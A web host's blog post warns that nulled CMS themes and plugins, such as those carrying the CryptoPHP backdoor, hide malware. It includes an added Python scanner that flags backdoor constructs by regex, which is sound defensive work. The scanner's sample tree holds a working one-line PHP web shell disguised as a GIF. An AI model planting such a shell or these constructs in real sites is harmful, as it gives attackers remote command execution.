In a recent blog post, I talked about how CryptoPHP, a backdoor malware bundled with nulled CMS plugins and themes, got on my servers and how I wasted an entire weekend cleaning up the mess.
While sending out a notification email to the clients whose servers were infected, I discovered that, way back in November 2014, I sent out an alert to all clients about this very malware. And before the recent CryptoPHP infection, I had spent innumerable hours detecting and cleaning up various rogue PHP code hidden in nulled scripts installed by some of these clients of mine (or their clients); and after each clean-up I’d send out a strong warning about the ethical, legal and security implications of using nulled scripts.
For those who need a refresher on the terminology, nulled scripts (or nulled code) are commercial web applications that are offered for free download at various pirate websites. These nulled scripts have been modified to remove the protection implemented by the original developer so the script can work anywhere without a license key.
Even though there may be pirate websites out there that provide nulled scripts with no strings attached (so to speak), these “clean” nulled scripts are the exception rather than the norm. In most cases these nulled scripts are more than the original scripts minus their protection: more often than not malware is also hidden inside the scripts. By publishing pirated themes and plugins free for anyone to use instead of having to pay for them, the actors behind these nulled scripts are social engineering unethical site administrators into installing the included backdoor on their server.
These backdoors (hidden malware code) are then used by the ne’er-do-wells behind them to command the websites and servers where the backdoors are installed to perform various nefarious and illegal activities such as email spam, unethical (aka blackhat) SEO, or denial of service attacks. Increasingly, huge numbers of these infected websites and servers are herded together by criminals into “botnets” and commanded to undertake large-scale attacks.
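As an added illustration of the kind of clean-up triage described above (example code written for this post's topic, not code from the original post or from any product), here is a small Python heuristic scanner that walks a theme or plugin tree and flags files containing the obfuscation constructs typically used by backdoors hidden in nulled scripts: code executed from a decoded blob, remote includes, user-controlled dynamic calls, the old `/e` regex modifier, and PHP tags inside files pretending to be images or stylesheets. The pattern names, weights, alert threshold and the constructed sample tree are this example's own assumptions; it is a triage aid that points a human at files worth reading, not a malware signature set, and it says nothing about CryptoPHP specifically.

```python
"""Heuristic triage scanner for backdoor-style PHP hidden in theme/plugin trees.

Added example: scores files against a few generic obfuscation patterns.
Every pattern name, weight and threshold here is this example's own choice.
"""
import os
import re
import tempfile

# Generic constructs that are rare in legitimate plugin code but common in
# backdoors. Each hit adds its weight to the file's score.
PATTERNS = [
    ("eval_of_decoded_blob", 5, re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\(", re.I)),
    ("remote_include", 5, re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I)),
    ("user_controlled_call", 4, re.compile(
        r"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("preg_replace_e_modifier", 4, re.compile(
        r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I)),
    ("long_base64_literal", 2, re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")),
]
PHP_TAG = re.compile(r"<\?php\b|<\?=", re.I)
PHP_EXTENSIONS = {".php", ".phtml", ".inc"}
ALERT_THRESHOLD = 4  # score at or above this marks a file for manual review


def scan_file(path):
    """Return (score, [matched pattern names]) for one file."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    score, hits = 0, []
    ext = os.path.splitext(path)[1].lower()
    # PHP code inside a file posing as an image, CSS, etc. is itself a red flag.
    if ext not in PHP_EXTENSIONS and PHP_TAG.search(text):
        score += 3
        hits.append("php_tag_in_non_php_file")
    for name, weight, rx in PATTERNS:
        if rx.search(text):
            score += weight
            hits.append(name)
    return score, hits


def scan_tree(root, threshold=ALERT_THRESHOLD):
    """Walk a directory; return {relative_path: (score, hits)} for files at/above threshold."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            score, hits = scan_file(full)
            if score >= threshold:
                flagged[os.path.relpath(full, root)] = (score, hits)
    return flagged


def build_sample_tree():
    """Write a constructed mini plugin/theme tree (sample data, not real malware) and return its root."""
    root = tempfile.mkdtemp(prefix="nulled-scan-")
    samples = {
        # Ordinary plugin code: should score 0.
        "plugin/clean.php": "<?php\nfunction my_widget($args) {\n"
                            "    return array_merge(array('title' => ''), $args);\n}\n",
        # "Loader" that runs a decoded blob (the blob decodes to a harmless echo).
        "plugin/inc/loader.php": "<?php\n@eval(base64_decode('ZWNobyAnaGknOw=='));\n",
        # PHP hidden behind a GIF header, calling whatever the request names.
        "theme/images/spacer.gif": "GIF89a<?php $f = $_GET['f']; $f($_POST['c']); ?>",
        "theme/style.css": "body { margin: 0; }\n",
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Scan the constructed tree; return sorted (path, score, hits) for flagged files."""
    root = build_sample_tree()
    flagged = scan_tree(root)
    return sorted((p.replace(os.sep, "/"), s, h) for p, (s, h) in flagged.items())


if __name__ == "__main__":
    for path, score, hits in demo():
        print(f"{score:2d}  {path}  {', '.join(hits)}")
```

Point `scan_tree()` at a real `wp-content` or equivalent directory to get a ranked list; anything flagged still needs a human to read the file, since legitimate code occasionally uses long base64 literals or dynamic calls, and a backdoor that avoids all of these patterns will score zero.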
If you think about it, why would anyone go through the trouble of acquiring hundreds or even thousands of these commercial scripts, setting up and maintaining a website, and uploading these themes for you to download for free? Are they merely anti-capitalists, or simply altruistic? No, and no. I’d wager that 99% of the time they do so because they hide their own malware in these downloads, so they can use sites that install them for various nefarious deeds.
So if the ethical and legal walls haven’t stopped you from stealing other people’s work (which is how I see using pirated software of any kind) in the past, here’s hoping the serious security risks mentioned here will. As for my own clients (and their clients), none of these have stopped them from using nulled scripts, themes and plugins in the past and I’m not holding my breath this time.